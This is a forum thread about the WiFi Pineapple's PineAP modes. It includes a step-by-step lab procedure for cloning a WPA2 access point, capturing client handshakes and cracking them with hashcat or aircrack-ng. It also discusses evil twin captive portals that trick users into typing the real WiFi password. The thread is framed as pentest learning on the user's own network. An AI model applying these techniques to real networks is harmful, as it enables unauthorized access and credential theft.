Evil WPA Access Point...

[olympus_mons]

Hi all,

I am getting very confused with terminology.

When I click PineAP > Access Points, I see three options, they are as follows...

- Management Access Point

- Open Access Point

- Evil WPA Access Point

I have kind of got the Evil Portal module working but I am wondering what the Evil WPA Access Point is for.

The Open Access Point is used with the Evil Portal module but what is the Evil WPA Access Point used for?

Also, what is the purpose of the Management Access Point? I thought this was for managing the Pineapple but I notice management can be done via the Open Access Point.

I am really struggling and the book that came with the Pineapple really does not help.

Thanks in advance,

[dark_pyrro]

The Evil WPA AP is used to try to capture handshakes from STA/clients that are making connect attempts to that AP/ESSID. You won't get the psk/password for the true AP, but you might be able to obtain handshakes that can be used later on to try to crack it and get the plain text psk for that network.

One way of "demoing" it

- Set up an AP using (for example) WPA2-PSK CCMP
- Connect a STA/client to that AP (only set up this specific AP on that device just to make the test/demo a bit easier)
- Do a recon scan using the Pineapple (if you don't want to add the information needed to the Evil AP manually)
- Click on the AP in the recon scan results
- Click "Clone WPA/2 AP" (disable the Evil AP at this point)
- Shutdown the "true" AP
- Enable the Evil AP on the Pineapple (that now should be set up to emulate the "true" AP)
- Try to connect to the Evil AP using the same device that previously was connected to the "true" AP
- See if any handshakes are captured on the Pineapple
- Download the capture files to some PC with Hashcat and/or aircrack-ng (running Kali Linux for example)
- Since you know the psk for this test/demo setup, try to crack it using hashcat (or aircrack-ng) and a wordlist containing the psk in order to verify that the captured handshake is valid

[olympus_mons]

Many thanks for this, I will give this a go 👍

Sure I saw a video somewhere that showed the pineapple catching the encrypted WPA key and then comparing that captured WPA key to the WPA key manually entered into a captive portal by the user, then if the encrypted WPA keys matched, the user would be redirected back to the actual AP. Or am I talking rubbish?

[dark_pyrro]

Not sure what you refer to when saying "WPA key". If you mean the handshake, it should not be possible to reuse/replay. You need to get hold of the actual psk. But if you can do that in some way, then it's possible to verify if anything obtained from social engineered users is the actual passphrase.

Regarding the management AP, this should be possible to control more in detail with the upcoming 2.0.0 firmware. It's still in beta and the feature to control access to the management interface is experimental.

[Sgt.Foose]

12 hours ago, olympus_mons said:

Many thanks for this, I will give this a go 👍

Sure I saw a video somewhere that showed the pineapple catching the encrypted WPA key and then comparing that captured WPA key to the WPA key manually entered into a captive portal by the user, then if the encrypted WPA keys matched, the user would be redirected back to the actual AP. Or am I talking rubbish?

I recently did a video on the Enterprise option in case your interested. I was waiting for a better Beta to do a video on Evil WPA in combination with the Evil Portal. This video will be uploaded within a week.

 

 

[olympus_mons]

On 3/31/2022 at 10:35 PM, dark_pyrro said:

Not sure what you refer to when saying "WPA key". If you mean the handshake, it should not be possible to reuse/replay. You need to get hold of the actual psk. But if you can do that in some way, then it's possible to verify if anything obtained from social engineered users is the actual passphrase.

Regarding the management AP, this should be possible to control more in detail with the upcoming 2.0.0 firmware. It's still in beta and the feature to control access to the management interface is experimental.

apologies for the delayed response and for the poor use of terminology, when I say WPA key I mean the pre shared key users use to connect to the AP.

I am sure I watched a video showing the Pineapple blocking access to the legitimate AP until the user entered the proper / actual pre shared key. The way in which the Pineapple knew the pre shared key being entered was the proper / actual pre shared key was by comparing the pre shared key captured in the handshake with the pre shared key entered by the user. The Pineapple compared the two encrypted values meaning the captured pre shared key still needed to be cracked with aircrack or hashcat etc.

Does this sound familiar?

I think airgeddon can do this, its an Evil Twin AP as opposed to an Evil Portal. I am just not sure how useful and Evil Portal will be during a pentest, however, I feel an Evil AP / Rogue AP will be very useful...

Edited April 9, 2022 by olympus_mons
more detail added

[dark_pyrro]

Every tool has its purpose. In any way, you have to refer to that video to be able to see it all in its context and get the full picture of the methodology used. I have seen a lot of videos over the years about the Pineapple, but can't recall anything that is similar to what you are describing. That doesn't mean it's not out there though, I may have missed watching some or just don't remember. The only thing that vaguely rings a bell is that Kody did some video (Null Byte), but that didn't involve a Pineapple as I remember it off the top of my head.

[olympus_mons]

2 hours ago, dark_pyrro said:

Every tool has its purpose. In any way, you have to refer to that video to be able to see it all in its context and get the full picture of the methodology used. I have seen a lot of videos over the years about the Pineapple, but can't recall anything that is similar to what you are describing. That doesn't mean it's not out there though, I may have missed watching some or just don't remember. The only thing that vaguely rings a bell is that Kody did some video (Null Byte), but that didn't involve a Pineapple as I remember it off the top of my head.

which video are you referring to please? I do not have the enterprise pineapple, I just have the normal mark 7, will the content of the video still apply?

[dark_pyrro]

No one else, except Hak5, have access to the Pineapple Enterprise since it's not released to market yet.

I haven't got any link to a specific video. I just seem to remember that I've seen something that is similar to what you describe, although it's not exactly the same since what you are trying to describe shouldn't work without additional actions.

[Iamgrooot]

The link to the video you’re looking for is here…at around mark 53:18 is where Kody is describing that evil twin attack with captive portal requiring the target to enter the correct WiFi password before they can proceed. Now my question is , is this possible with the WiFi pineapple?